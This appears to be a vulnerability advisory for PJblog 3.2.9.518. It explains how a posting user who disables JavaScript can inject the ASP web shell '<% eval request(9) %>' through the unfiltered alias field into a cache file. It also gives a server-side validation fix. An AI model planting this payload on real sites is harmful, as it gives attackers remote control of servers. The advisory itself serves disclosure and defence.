Author: no minute left
Version: PJblog 3.2.9.518 (the latest version as of February 9)

Conditions for exploitation:
1. Full static mode is in use (full static mode is the default).
2. Users are allowed to post (ordinary users cannot post by default, so this is a little tricky).

Vulnerability description:
PJblog 3.2.9.518 relies on JavaScript to filter special characters. In full static mode, an ordinary user can insert an ASP Trojan while posting. PJblog 3.2.9.518 is otherwise very secure: passwords are stored as sha1(pass + salt) with a salt 6 characters long, so even a successful injection yields a password hash that is difficult to crack.

The relevant code in class/cls_logAction.asp is as follows:

<%
Class logArticle
    ' .................. omitted ..................
    outIndex = outIndex & "[""A"";" & AListC & ";(" & clearT(AList) & ")]" & Chr(13)
    outIndex = outIndex & "[""G"";" & GListC & ";(" & clearT(GList) & ")]" & Chr(13)
    Dim CateKeys, CateItems, CateHKeys, CateHItems
    CateKeys = CateDic.Keys
    CateItems = CateDic.Items
    CateHKeys = CateHDic.Keys
    CateHItems = CateHDic.Items
    For i = 0 To CateDic.Count - 1
        outIndex = outIndex & "[""" & CateKeys(i) & """;" & CateHItems(i) & ";(" & clearT(CateItems(i)) & ")]" & Chr(13)
    Next
    SaveList = SaveToFile(outIndex, "cache/listCache.asp")
    ' .................. omitted ..................
End Class
%>

The SaveToFile function writes the content of outIndex to cache/listCache.asp. blogpost.asp calls logArticle; part of its code is as follows:

<%
' ........................
Set lArticle = New logArticle
lArticle.categoryID = request.form("log_CateID")
lArticle.logTitle = request.form("title")
lArticle.logAuthor = memName
lArticle.logEditType = request.form("log_editType")
lArticle.logIntroCustom = request.form("log_IntroC")
lArticle.logIntro = request.form("log_Intro")
lArticle.logWeather = request.form("log_weather")
lArticle.logLevel = request.form("log_Level")
lArticle.logCommentOrder = request.form("log_comorder")
lArticle.logDisableComment = request.form("log_DisComment")
lArticle.logIsShow = IsShow
lArticle.logIsTop = request.form("log_IsTop")
lArticle.logIsDraft = request.form("log_IsDraft")
lArticle.logFrom = request.form("log_From")
lArticle.logFromURL = request.form("log_FromURL")
lArticle.logDisableImage = request.form("log_disImg")
lArticle.logDisableSmile = request.form("log_DisSM")
lArticle.logDisableURL = request.form("log_DisURL")
lArticle.logDisableKeyWord = request.form("log_DisKey")
lArticle.logMessage = request.form("Message")
lArticle.logTrackback = request.form("log_Quote")
lArticle.logTags = request.form("tags")
lArticle.logPubTime = request.form("PubTime")
lArticle.logPublishTimeType = request.form("PubTimeType")
If blog_postFile = 2 Then
    lArticle.logCname = request.form("cname")
    lArticle.logCtype = request.form("ctype")
End If
lArticle.logReadpw = pws
lArticle.logPwtips = pwtips
lArticle.logPwtitle = pwtitle
lArticle.logPwcomm = pwcomm
lArticle.logMeta = request.form("log_Meta")
lArticle.logKeyWords = keyword
lArticle.logDescription = B_description
If request.form("FirstPost") = 1 Then
    lArticle.isajax = false
    lArticle.logIsDraft = false
    postLog = lArticle.editLog(request.form("postbackId"))
Else
    lArticle.isajax = false
    postLog = lArticle.postLog
End If
Set lArticle = Nothing
%>

lArticle.logCname = request.form("cname") does not filter "<%" and "%>".

Exploitation:
1. Log in as a user and create a post.
2. Disable JavaScript in the browser. This step is required; otherwise '<' and '>' cannot be entered, because the author did consider the security issue and filters them on the client side with common.js. Part of common/common.js is as follows:

// create a folder rule example:
// <input onblur="ReplaceInput(this, window.event)" onkeyup="ReplaceInput(this, window.event)" />
function ReplaceInput(obj, cevent) {
    var str = ["<", ">", "/", "\\", ":", "*", "?", "|", "\"", /[\u4E00-\u9FA5]/g];
    if (cevent.keyCode != 37 && cevent.keyCode != 39) {
        // obj.value = obj.value.replace(/[\u4E00-\u9FA5]/g, '');
        for (var i = 0; i < str.length; i++) {
            obj.value = obj.value.replace(str[i], "");
        }
    }
}

3. Insert <% eval request(9) %> in the alias field. After submission, a Trojan is written to cache/listCache.asp; its password is 9.

Temporary solution: prohibit ordinary users from posting.
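The root cause above is that the only filter sits in the browser, where it can be switched off. The fix belongs on the server, in blogpost.asp, before the alias reaches logArticle and is written into cache/listCache.asp. The following is an added example of such a check, not PJblog's own code: the function name IsSafeAlias and the whitelist pattern are assumptions chosen for illustration; the "cname" and "ctype" fields and the blog_postFile = 2 condition are the ones shown in the blogpost.asp excerpt above.

```vbscript
<%
' Added example, not PJblog code: validate the alias ("cname") on the server.
' Whitelisting is deliberate: instead of stripping "<" and ">" (the approach the
' client-side common.js takes), the alias must match an allowed shape, so the ASP
' script delimiters can never be part of a value that is later written to the
' static cache file. IsSafeAlias and its pattern are assumptions for illustration.
Function IsSafeAlias(value)
    Dim re
    Set re = New RegExp
    ' Letters, digits, underscore and hyphen only, 1 to 64 characters.
    re.Pattern = "^[A-Za-z0-9_\-]{1,64}$"
    re.IgnoreCase = False
    IsSafeAlias = re.Test(value)
    Set re = Nothing
End Function

' Replacement for the unfiltered assignment in blogpost.asp.
If blog_postFile = 2 Then
    Dim cname
    cname = Trim(Request.Form("cname"))
    If Not IsSafeAlias(cname) Then
        ' Reject the request instead of silently "cleaning" the value, so an
        ' attempt to submit script delimiters is visible in the logs as an error.
        Response.Status = "400 Bad Request"
        Response.Write "Invalid alias: only letters, digits, _ and - are allowed."
        Response.End
    End If
    lArticle.logCname = cname
    lArticle.logCtype = Request.Form("ctype")
End If
%>
```

Two practical notes for anyone applying a check like this: the ASP processor ends a script block at the first `%>` it sees, even inside a string or a comment, so the validation code itself must not contain that sequence; and the same whitelist rule should be applied to any other form field that logArticle copies into the generated cache file, since the client-side ReplaceInput filter protects none of them once JavaScript is disabled.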